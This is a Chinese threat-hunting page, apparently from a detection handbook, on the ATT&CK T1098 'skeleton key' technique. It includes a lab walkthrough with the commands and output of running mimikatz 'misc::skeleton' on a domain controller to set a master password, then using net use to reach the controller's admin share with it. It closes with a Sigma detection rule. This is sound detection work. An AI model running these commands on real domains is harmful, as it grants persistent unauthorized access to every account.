跳转至

T1098-win-万能密码

来自ATT&CK的描述

帐户操作可以帮助攻击者维持在目标组织环境中对凭据或某些权限级别的访问权限。账户操作可能包括修改权限,修改凭据,添加或更改权限组,修改帐户设置或修改执行身份验证等方式。为了创建或操纵帐户,攻击者必须已经对系统或域具有足够的权限。

测试案例

使用万能密码(skeleton key),可以对域内权限进行持久化操作。

检测日志

windows 安全日志

测试复现

步骤1(PC上执行,普通域用户权限)

C:\Users\xiaomi>dir \\dc.xiaomi.org\c$  
拒绝访问。

C:\Users\xiaomi>net use \\dc.xiaomi.org\ipc$ "admin.098" /user:xiaomi\administra
tor
命令成功完成。

C:\Users\xiaomi>dir \\dc.xiaomi.org\c$
 驱动器 \\dc.xiaomi.org\c$ 中的卷没有标签。
 卷的序列号是 50E9-7D0C

 \\dc.xiaomi.org\c$ 的目录

2009/07/14  11:20    <DIR>          PerfLogs
2020/03/23  15:24    <DIR>          Program Files
2020/03/23  15:24    <DIR>          Program Files (x86)
2020/03/23  14:47    <DIR>          Users
2020/03/23  15:30    <DIR>          Windows
               0 个文件              0 字节
               5 个目录 32,728,838,144 可用字节

C:\Users\xiaomi>net use
会记录新的网络连接。


状态       本地        远程                      网络

-------------------------------------------------------------------------------
OK                     \\dc.xiaomi.org\ipc$      Microsoft Windows Network
命令成功完成。


C:\Users\xiaomi>net use \\dc.xiaomi.org\ipc$ /del /y
\\dc.xiaomi.org\ipc$ 已经删除。


C:\Users\xiaomi>net use
会记录新的网络连接。

列表是空的。

步骤2(DC上执行,管理员权限)

C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe "privilege::debug
" "misc::skeleton" exit

  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

mimikatz(commandline) # exit
Bye!

系统提示Skeleton Key已经注入成功。此时,会在域内的所有账户中添加一个Skeleton key,其密码默认为“mimikatz”。接下来可以以域内任何用户的身份,配合该Skeleton Key,进行域内身份授权验证了。

步骤3(PC上执行,普通域用户权限)

C:\Users\xiaomi>net use \\dc.xiaomi.org\ipc$ "mimikatz" /user:xiaomi\administrat
or
命令成功完成。


C:\Users\xiaomi>dir \\dc.xiaomi.org\c$
 驱动器 \\dc.xiaomi.org\c$ 中的卷没有标签。
 卷的序列号是 50E9-7D0C

 \\dc.xiaomi.org\c$ 的目录

2009/07/14  11:20    <DIR>          PerfLogs
2020/03/23  15:24    <DIR>          Program Files
2020/03/23  15:24    <DIR>          Program Files (x86)
2020/03/23  14:47    <DIR>          Users
2020/03/23  15:30    <DIR>          Windows
               0 个文件              0 字节
               5 个目录 32,758,198,272 可用字节

测试留痕

windows安全事件ID,多事件关联分析

检测规则/思路

Sigma规则

title: Windows 万能密码
description: Windows server 2008 R2\win 7
references: https://0xsp.com/ad-attack-or-defense/ad-ttps-list
tags: T1098
status: 测试阶段
author: 12306Bro
logsource:
    product: windows
    service: security
detection:
    selection1:
        EventID: 4673  #调用权限的服务
    selection2:
        EventID: 4611  #受信任的登录进程已在本地安全机构注册
    selection3:
        EventID: 4688  #新进程创建
    selection4:
        EventID: 4689  #退出进程
    condition: all of them
    timeframe: last 5s
level: medium

建议

以上规则存在一定程度的不稳定性,谨慎使用!

相关TIP

[[Threathunting-book/8-凭证获取/T1098-win-账户操作]]

参考推荐

MITRE-ATT&CK-T1098

https://attack.mitre.org/techniques/T1098/